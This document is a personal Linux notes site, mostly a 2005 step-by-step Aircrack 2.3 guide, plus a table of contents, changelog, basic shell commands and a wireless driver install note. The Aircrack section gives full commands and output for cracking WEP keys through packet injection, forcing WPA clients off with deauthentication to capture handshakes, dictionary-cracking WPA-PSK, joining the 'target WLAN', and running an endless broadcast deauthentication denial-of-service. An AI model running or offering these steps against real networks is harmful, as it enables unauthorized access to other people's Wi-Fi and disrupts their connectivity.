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Aircrack 2.

3 (WEP, WPA-PSK Creck)

Aircrack 2.3 (WEP, WPA-PSK Creck)

11/Nov/2005 tested on SuSE 9.3

Aircrack is a set of tools for auditing wireless networks:

● airodump: 802.11 packet capture program

● aireplay: 802.11 packet injection program
● aircrack: static WEP and WPA-PSK key cracker
● airdecap: decrypts WEP/WPA capture files


1. Download Aircrack from http://100h.org/wlan/aircrack/

2. Read the documentation (README.html) and follow. It has the most comprehensive explanation.
3. I have a CISCO Aironet 350 and PrismGT card (Corega WLCB-54GT) and both work fine. Aironet 350 works for
11b network but aireplay is not supported. PrismGT card works for 11b/g network and both airodump and aireplay
works. For PrismGT card, I needed to compile the driver. But it was not so difficult as expected. I just follow the
explanation in the document.

WEP Attack

How to capture (airodump) (WEP)

1. For this example, a PrismGT card is used. It is recognized as eth0. But other card may be ath0 or something else.
2. Change to monitor mode

# airmon.sh
usage: /usr/local/bin/airmon.sh [channel]
Interface Chipset Driver
eth0 PrismGT prism54

# airmon.sh start eth0

usage: /usr/local/bin/airmon.sh [channel]
Interface Chipset Driver
eth0 PrismGT prism54 (monitor mode enabled)

3. Search WLANs. 0 to hop between channels.

# airodump eth0 out 0


00:0D:0B:98:96:7F 48 2 0 11 54 WEP? 4B18E8C83ABD

00:A0:B0:40:5C:84 87 13 16 1 54 WEP HOGE

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Aircrack 2.3 (WEP, WPA-PSK Creck)


00:A0:B0:40:5C:84 00:04:23:52:80:41 86 4 HOGE

4. Press Ctl+c. Next we will capture only channel 1 (ESSID HOGE), and specify 1 to only cature unique WEP IVs. It
saves space.

# airodump eth0 out 1 1


00:A0:B0:40:5C:84 87 36 48 1 54 WEP HOGE


00:A0:B0:40:5C:84 00:04:23:52:80:41 87 38 HOGE

Fake authentication (aireplay) (WEP)

1. We will use airoeplay to inject packets, so we can capture packets easily. Open another console. Copy BSSID and
paste as,

# aireplay -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 eth0

12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)

If it cannot associate, use station's MAC,

# aireplay -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0

Some access points require to reassociate every 20 seconds, otherwise the fake client is considered disconnected. In
this case, setup the periodic re-association delay:

# aireplay -1 20 -e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0

2. Once associated, send packets as following. If you are not associated, you see no send packet.

# aireplay -3 -b 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 -x 600 eth0

Saving APR requests in replay_arp-1112-031550.cap
You must also start airodump to capture replies.
Read 39123 packets (got 1024 APR requests), sent 24543 packets...

3. If it stoped sending, you need to associate again. Consider setup of the periodic re-association delay. I used crontab to
re-associate again and again.

How to crack (aircrack) (WEP)

1. Open a new console, and type following command. Aircrack can read the updated file automatically so you can run

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Aircrack 2.3 (WEP, WPA-PSK Creck)

airodump and aircrack at the same time.

# aircrack -x -0 out.ivs

2. For 104bit WEP needs about one million IVs. You may need one day or more time to capture the packets. However if
you use aireplay and inject, you need only few hours.
3. This is the result. It needed only a quarter a million.

4. Aircrack can also run on Windows but aireplay is not supported though.

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Aircrack 2.3 (WEP, WPA-PSK Creck)

Connect to the target WLAN (WEP)

1. Once you find the key, as XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX, use it to connect to the WLAN.

# iwconfig eth0 mode Managed key XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX

# dhcocd eth0
# ifconfig eth0
eth0 Link encap:UNSPEC HWaddr 00-0A-79-18-35-7A-0A-00-00-00-00-00-00-00-00-00
inet addr: Bcast: Mask:
inet6 addr: fe80::20a:79ff:fe18:357a/64 Scope:Link
RX packets:330521 errors:0 dropped:0 overruns:0 frame:0
TX packets:157988 errors:3 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:24164635 (23.0 Mb) TX bytes:9864176 (9.4 Mb)
# ping google.com
PING google.com ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=234 time=203 ms
64 bytes from icmp_seq=2 ttl=234 time=201 ms

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Aircrack 2.3 (WEP, WPA-PSK Creck)

WPA-PSK (Pre-shared key) Attack

How to capture (airodump) (WPA-PSK)

1. For this example, PrismGT card is used. It is recognize as eth0. But other card may be ath0 or something.
2. Change to monitor mode

# airmon.sh
usage: /usr/local/bin/airmon.sh [channel]
Interface Chipset Driver
eth0 PrismGT prism54

# airmon.sh start eth0

usage: /usr/local/bin/airmon.sh [channel]
Interface Chipset Driver
eth0 PrismGT prism54 (monitor mode enabled)

3. Search WLANs. 0 to hop between channels.

# airodump eth0 out 0


00:0D:0B:98:96:7F 48 2 0 11 54 WEP? 4B18E8C83ABD

00:A0:B0:40:5C:84 87 13 16 1 54 WEP HOGE


00:A0:B0:40:5C:84 00:04:23:52:80:41 86 4 HOGE

4. Press Ctl+c. Next we will capture only channel 1 (ESSID HOGE). Capture all packets. Don't specify another 1.

# airodump eth0 out 1


00:A0:B0:40:5C:84 87 36 48 1 54 WEP HOGE


00:A0:B0:40:5C:84 00:04:23:52:80:41 87 38 HOGE

WPA Handshake capture (airoplay) (WPA-PSK)

Capture WPA handshakes by forcing clients to reauthenticate. It can also be used to generate ARP requests as Windows
clients sometimes flush their ARP cache when disconnected. This attack is totally useless if there are no associated wireless

1. WPA Handshake capture

# aireplay -0 5 -a 00:A0:B0:40:5C:84 -c 00:04:23:52:80:41 eth0

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Aircrack 2.3 (WEP, WPA-PSK Creck)

00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]

00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]
00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]
00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]
00:43:41 Sending DeAuth to station -- STMAC: [00:04:23:52:80:41]

2. ARP request generation (optional) if above does not work.

# aireplay -0 10 -a 00:A0:B0:40:5C:84 eth0

# aireplay -3 -b 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0

After sending the five deauthentication packets, it starts listening for APR requests with attack 3. The -h option is
necessary and must be the MAC address of an associated client.
3. Mass denial-of-service (MDOS) attack

# aireplay -0 0 -a 00:A0:B0:40:5C:84 eth0

With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus
preventing clients from staying connected.

Dictionary attack (airoplay) (WPA-PSK)

1. Download dictionaries. i.e from http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/

2. Make a dictionary.

# zcat all.gz | egrep -v '^#' > dic

3. If you do not have a handshake packet, you cannot continue, so you do aireplay -0 again.

# aircrack -w dic -0 out.cap

Opening out.cap
Read 154839 packets.

# BSSID ESSID Encryption

1 00:A0:B0:40:5C:84 HOGE WPA (1 handshake)

2 00:02:2D:C2:38:AF Unknown

Index number of target network ? 1

4. Once you find a handshake packet, you can stop airodump.

5. Yes, you find it! For this, I actually used Windows because my Linux is running an ancient Pentium II 300kHz! Only
this process needs CPU power, so I used my Windows (Celeron 3GHz). It actually took less than three minutes,

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Aircrack 2.3 (WEP, WPA-PSK Creck)

Note: In my experience, using Aircrack is the best tool compare to others. Aircrack on Linux supports packet injection which
means we can increase the traffic, so we need only few hours to capture sufficient packets. Otherwise you will need several

Here is other my reports.

Tool OS CPU usage Encryption 802. NIC Support Packet injection My recommendation
Windows High WEP 11b Few Not supported Low
Linux High WEP 11b Few Not supported Low
Windows Low WEP, WPA 11a/b/g Many Not supported Mid
Aircrack Linux Low WEP, WPA 11a/b/g Many Supported! Recommended!

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Aircrack 2.3 (WEP, WPA-PSK Creck)



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GNU/Linux Practice Note

GNU/Linux Practice Note



1. What is the Linux

2. Tera Term Pro ver.2.3 (Terminal Emulator)
3. User Operation
1. Introduction
2. Basic Commands
3. The VI Editor
4. Network Commands
4. Root user operation
1. Root user's manual
2. How to backup user account
3. How to add a new disk
4. How to create swap space
5. How to create number of users and passwords automatically
5. Wireless Network
1. Install CISCO Aironet 350 Wireless Card
2. Install WLCB-54GT (11g/54Mbps, PrisumGT) on SuSE 9.1 (kernel2.6)
6. USB
1. How to use USB HDD on Linux
7. Package Management
1. rpm-4.0.3-1.03 (Red Hat Package Manager)
2. up2date-2.7.86-7.x.3 (Update Agent)
3. rpmfind-1.7-2.html
8. X Windows
1. Change Display Resolution
9. DNS Server
1. bind-9.1.3-4 (DNS)
10. E-Mail Server
1. sendmail-8.11.6-3l (SMTP, POP3, IMAP4)
2. fetchmail-5.0.0 (Mail-retrieval and forwarding utility)
3. Mailing List

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GNU/Linux Practice Note

1. mailman-2.0.11-1 (Mailing List Manager)

11. Web Server
1. PHP-4.3.11 + Oracle 10g dso
2. Virtual Host by Apache
3. Apache1.3 (HTTP)
4. Apache Cocoon 2.0.4
5. Web Application
1. squirrelmail-1.4.0-1.7.x (Web Mail)
2. usermin-0.940-1 (Web-based interface for user)
3. imp-2.0.11(webmail)
4. imp-2.2.0(webmail)
5. webalizer-1.30-04 (Web server log file analysis program)
6. webmin-0.83 (Web-based interface for system administration)
12. Proxy Server
1. squid-2.2.STABLE4-5 (PROXY)
2. sarg-1.4.1-109 (Squid Analysis Report Generator)
3. delegate7.9.3 (PROXY)
4. World Wide Web Offline Explorer (wwwoffle-2.7f) (Proxy)
5. Transparent HTTP Proxy 1.2 using ipchains
13. News Server
1. inn-2.2 (NEWS)
1. postgresql-7.0.2 (RPM Package)
2. Sybase Adaptive Server
15. Network Time Protocol (NTP) Server
1. xntp-4.2.0a-46 (NTP)
16. SNMP
1. rrdtool-1.2.11-3 + cacti-0.8.6f-2 (Monitoring)
2. mrtg-2.12.2-2 (Monitoring)
3. ucd-snmp-4.1.2-8
17. Search Engine
1. namazu-
2. namazu-2.0.4
18. Multimedia
1. xine-ui-0.9.13 (Video Player)
2. qtamp-0.6 (MP3 Player)
3. grip-2.95-1+lame3.70 (CD Ripper+MP3 Encode)
19. Others
1. netacct-mysql-0.78 (Network Traffic Accounting Daemon)
2. syslogd-1.4.1-542 (syslog)

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GNU/Linux Practice Note

3. CVS 1.11.17-6
4. user_mode_linux-
5. dhcp-3.0PL1-23 (DHCPD)
6. samba-2.0.3-19990228 (SMB)
7. quota-3.06-9
8. ppp-2.3.5 (PPP)
9. vnc-3.3.3r2_x86_linux_2.0 (Virtual Network Computing)
10. nfs-utils-0.3.1-13 (NFS)
11. openldap-1.2.9-6 (LDAP)
12. wu-ftpd-2.4.2b16-4 (FTP)
13. irc-2.9.5(IRC)
14. mgetty-1.1.14 (PPP Server)
15. pbeagent-7.0.0-119 (PowerChute Business Edition Agent)
20. Security & Monitoring
1. aide-0.10-51 (IDS)
2. Aircrack 2.3 (WEP, WPA-PSK Creck)
3. AirSnort 0.2.1a (WEP Creck)
4. snort-2.3.3-2 (NDIS, oinkmaster, ACID)
5. Nmap-3.81-4 (port-scanning)
6. Nessus-2.2.3-3 (Vulnerability scanner)
7. ettercap-NG-0.7.1 (sniffer)
8. etherape-0.9.0 (Network Traffic Browser)
9. ipchains-1.3.10-3 (IP Masquarade & Packet Filtering)
10. iptables-1.3.3-3 (IP Masquarade (NAT), Packet Filtering & Transparent Proxy)
11. MAPS RBL (Realtime Blackhole List)
12. ntop-1.2a12 (Network Monitor)
13. openssh-2.3.0p1-4
14. swatch-2.2 (Monitoring system activity)
15. tcp_wrappers-7.6 (Monitor and filter incoming requests)
16. ethereal-0.8.13-1 (Network protocol analyzer)
21. Kernel Configuration
1. kernel2.4.x
2. Using the ext3 filesystem in 2.4 kernels
22. Links
23. Previous Version's Documents

Ver Date Description

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GNU/Linux Practice Note

2.8 2005/11/11 Aircrack 2.3 (WEP Creck) is added

2.7 2005/10/55 Nmap-3.81-4 (port-scanning)
2.6 2003/01/13 mrtg-2.10.5-1 is updated for Fedora core 1
2.5 2003/12/05 etherape-0.9.0 (Network Traffic Browser) is added
2.4 2003/05/23 dhcp is updated
Install CISCO Aironet 350 Wireless Card and How to use USB HDD are
2.3 2003/04/25
Apache Cocoon 2.0.4 is added
2.2 2003/04/09
squirrelmail-1.4.0-1.7.x is updated
2.1 2002/11/08 AirSnort 0.2.1a (WEP Creck) is added
2.0 2002/09/23 squirrelmail-1.2.8-1.7.x (Web Mail) is added
1.9 2002/09/23 mailman-2.0.11-1 (Mailing List Manager) is added
1.8 2002/09/03 up2date-2.7.86-7.x.3 (Update Agent) is added
1.7 2002/07/30 usermin-0.940-1 is added
1.6 2002/06/08 nfs-utils-0.3.1-13 (NFS) is added
1.5 2002/06/06 sendmail-8.11.6-3l is added
1.4 2002/05/28 bind-9.1.3-4 is added
1.3 2002/05/15 Delegate is updated
1.2 2001/05/12 MAPS RBL (Realtime Blackhole List) is added
1.1 2001/05/06 ipchains-1.3.10-3 is added for Redhat 7.1
1.0 2001/04/01 Released
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Basic Commands

Basic Commands
1. ls
2. cp
3. mv
4. rm
5. mkdir
6. rmdir
7. cat
8. grep
9. chmod
10. kill
11. passwd
12. man

ls - list contents of directories

$ ls
file1 file2 file3

● ls -l
In addition to the name of each file, print the file type, permissions, number of hard links, owner name,
group name, size in bytes, and timestamp (the modification time unless other times are selected).For
files with a time that is more than 6 months old or more than 1 hour into the future, the times.

$ ls -l
total 3
-rw-r--r-- 1 guest users 8 Aug 4 15:56 file1
-rw-r--r-- 1 guest users 8 Aug 5 15:57 file2
-rw-r--r-- 1 guest users 8 Aug 4 15:57 file3

● ls -lt
Sort directory contents by timestamp instead of alphabetically, with the newest files listed first.

$ ls -lt
total 3
-rw-r--r-- 1 guest users 8 Aug 5 15:57 file2
-rw-r--r-- 1 guest users 8 Aug 4 15:57 file3

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Basic Commands

-rw-r--r-- 1 guest users 8 Aug 4 15:56 file1

cp - copy files

cp [options] source dest

$ ls
file1 file2 file3
$ cp file1 file4
$ ls
file1 file2 file3 file4

mv - rename files

mv [options] source dest mv [options] source... directory

$ ls
file1 file2 file3 file4
$ mv file4 /tmp
$ ls
file1 file2 file3
$ cd /tmp
[guest@linux /tmp]$ ls

$ ls
file1 file2 file3 file4
$ mv file4 file5
$ ls
file1 file2 file3 file5

rm - remove files

$ ls
file1 file2
$ rm file2
$ ls

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Basic Commands

mkdir - make directories

$ ls
$ mkdir directory
$ ls -lt
total 2
drwxr-xr-x 2 guest users 1024 Aug 5 11:40 directory/
-rw-r--r-- 1 guest users 8 Aug 4 16:04 file1

rmdir - remove empty directories

$ ls
directory/ file1
$ rmdir directory
$ ls

cat - concatenate files and print on the standard output

$ cat file1
101 3people 2-DK
102 none 1-room
201 2people 2-DK
202 4people 3-LDK

grep - print lines matching a pattern

grep [-cvn] pattern [file1 file2 ...]

- Suppress normal output; instead print a count of matching lines for each input file. With the -v,-
c revert-match option (see below), count non-match
Invert the sense of matching, to select non-matching lines.
Prefix each line of output with the line number within its input file.

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Basic Commands

$ cat file1
101 3people 2-DK
102 none 1-room
201 2people 2-DK
202 4people 3-LDK

$ cat file2
301 4people 4-DK
302 3people 3-LDK
401 none 2-DK
402 2people 2-DK

$ grep LDK *
file1:202 4people 3-LDK
file2:302 3people 3-LDK

chmod - change the access permissions of files

[root@ns public_html]# ls -l
-rw------- 1 hoge staff 163 Aug 7 22:39 index.html
[root@ns public_html]# chmod g+r index.html
[root@ns public_html]# ls -l
-rw-r----- 1 hoge staff 163 Aug 7 22:39 index.html
[root@ns public_html]# chmod 644 index.html
[root@ns public_html]# ls -l
-rw-r--r-- 1 hoge staff 163 Aug 7 22:39 index.html

kill - terminate a process

● EX1)

# ps ax | grep dhcpd
278 ? S 0:00 /usr/sbin/dhcpd
7308 p1 S 0:00 grep dhcpd
# kill 278
# ps ax | grep dhcpd
7310 p1 S 0:00 grep dhcpd

● EX2)

# kill `ps ax | awk '/pppd/ {print $1}'`

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Basic Commands

passwd - update a user's authentication tokens

$ passwd
Changing password for guest
(current) UNIX password:
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully

man - format and display the on-line manual pages

man keyword

$ man ls

LS(1) LS(1)

ls, dir, vdir - list contents of directories

ls [-abcdfgiklmnpqrstuxABCFGLNQRSUX1] [-w cols] [-T cols]
[-I pattern] [--all] [--escape] [--directory] [--inode]
[--kilobytes] [--numeric-uid-gid] [--no-group] [--hide-
control-chars] [--reverse] [--size] [--width=cols] [--tab-
size=cols] [--almost-all] [--ignore-backups] [--classify]
[--file-type] [--full-time] [--ignore=pattern] [--derefer-
ence] [--literal] [--quote-name] [--recursive]
[--sort={none,time,size,extension}] [--format={long,ver-
[--time={atime,access,use,ctime,status}] [--help] [--ver-
sion] [--color[={yes,no,tty}]] [--colour[={yes,no,tty}]]

This documentation is no longer being maintained and may


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Basic Commands


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Install Corega WLCB-54GT (11g/54Mbps, PrisumGT) on SuSE 9.3 (kernel2.6)

Tested on WLCB-54GT and SuSE 9.3 on 27 Oct 2005

Install Corega WLCB-54GT

(11g/54Mbps, PrisumGT) on SuSE 9.3
SuSE 9.3 could not detect my 11g PCMCIA card (Corega WLCB-54GT) saying,

# /etc/init.d/network restart
Shutting down network interfaces:
eth0 device: Harris Semiconductor D-Links DWL-g650 A1 (rev
eth0 configuration: wlan-bus-pci-0000:02:00.0
Shutting down service network . . . . . . . . . . . . .
Hint: you may set mandatory devices in /etc/sysconfig/network/config
Setting up network interfaces:
lo IP address:
eth0 device: Harris Semiconductor D-Links DWL-g650 A1 (rev
eth0 configuration: wlan-bus-pci-0000:02:00.0
SIOCSIFFLAGS: No such file or directory
eth0 (DHCP) . . . . . no IP address yet... backgrounding.
Setting up service network . . . . . . . . . . . . . .

In /var/log/messages

Nov 18 11:32:48 linux kernel: eth0: islpci_open()

Nov 18 11:32:48 linux kernel: eth0: resetting device...
Nov 18 11:32:48 linux kernel: eth0: uploading firmware...
Nov 18 11:32:48 linux kernel: eth0: firmware uploaded done, now
triggering reset

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Install Corega WLCB-54GT (11g/54Mbps, PrisumGT) on SuSE 9.3 (kernel2.6)

So I have downloaded the latest firmware for the Linux prism54 driver from http://100h.org/wlan/linux/
prismgt/ into /usr/lib/hotplug/firmware/ and rename it

# cd /usr/lib/hotplug/firmware/
# wget http://100h.org/wlan/linux/prismgt/
# mv isl3890

Note: isl (India, Siera, Lima)

That is all I have done. Then you configure by YaST and will work fine.



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